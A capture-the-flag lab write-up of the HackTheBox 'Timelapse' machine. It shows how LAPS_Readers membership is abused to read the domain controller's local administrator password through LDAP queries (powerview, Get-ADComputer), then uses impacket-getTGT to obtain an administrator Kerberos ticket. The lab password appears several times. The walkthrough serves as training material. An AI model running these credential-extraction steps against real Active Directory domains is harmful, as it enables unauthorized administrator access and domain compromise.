InfoSec LAB

Timelapse_ReadLAPSPassword

Created: 2 min read

ReadLAPSPassword

as [[timelapse_bloodhound#[readlapspassword](https //bloodhound.readthedocs.io/en/latest/data-analysis/edges.html readlapspassword)|discovered]] during the bloodhound session, the current user’s membership to the laps_readers group grants the readlapspassword privilege presence of laps has been hinted on numerous occasions throughout the engagement up until now.

i will first confirm the installation of laps

Confirmation

LAPS installation appears to have been made to the usual C:\Program Files directory

*Evil-WinRM* PS C:\> Get-ADObject 'CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=TIMELAPSE,DC=HTB'
 
DistinguishedName                                               Name          ObjectClass     ObjectGUID
-----------------                                               ----          -----------     ----------
CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=TIMELAPSE,DC=HTB ms-Mcs-AdmPwd attributeSchema 3f9cf79b-dc5d-42b2-a89b-4eec1c917ed1

Installation can also be checked through the Get-ADObject PowerShell cmdlet, to query for the domain object that presents LAPS installation. This indicates that LAPS is installed as a schema extension to the target domain

Abuse

Now that the installation has been verified above, I can move on to abusing the privilege While there are multiple ways to abuse the privileges granted to read LAPS passwords on the compromised user account, it’s important to note that the password information is stored as an LDAP attribute within the Active Directory schema. This schema extension allows for the centralized storage of local administrator passwords for domain computers.

Consequently, these passwords can be queried remotely through LDAP without requiring the establishment of a PowerShell session, making it a potential security risk when unauthorized access to the schema is obtained.

Therefore, it can be checked through an LDAP query

┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ KRB5CCNAME=svc_deploy@dc01.timelapse.htb.ccache powerview 'timelapse.htb/@dc01.timelapse.htb' -k --no-pass --use-ldaps --dc-ip $IP -q 'Get-DomainObject "CN=DC01,OU=DOMAIN CONTROLLERS,DC=TIMELAPSE,DC=HTB" -ResolveGUIDs' | grep -i ms-Mcs-AdmPwd
[2023-10-25 09:57:44] LDAP Signing NOT Enforced!
ms-mcs-admpwd                     : 6%HZ8hr1w5/Jj}o}r(7em/55
ms-mcs-admpwdexpirationtime       : 133430914802257711

While any LDAP tool can be used for querying, I find the Python implementation of PowerView powerful as it accepts the TGT ms-mcs-admpwd is the LDAP attribute that stores the LAPS password The LAPS password is 6%HZ8hr1w5/Jj}o}r(7em/55

*evil-winrm* ps c:\Users\svc_deploy\Documents> Get-ADComputer -Identity DC01 -Properties "ms-MCS-AdmPwd" | Select ms-MCS-AdmPwd
 
ms-MCS-AdmPwd
-------------
6%HZ8hr1w5/Jj}o}r(7em/55

or it can be done using the default activedirectory PowerShell module from an existing PowerShell session 6%HZ8hr1w5/Jj}o}r(7em/55

This is essentially the password of the local administrator user, but it must be validated

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ impacket-getTGT timelapse.htb/administrator@dc01.timelapse.htb -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password: 6%HZ8hr1w5/Jj}o}r(7em/55
[*] Saving ticket in administrator@dc01.timelapse.htb.ccache

Validation complete. TGT generated for the administrator user Moving on to the Privilege Escalation phase for the complete domain compromise

Interactive Graph View

Backlinks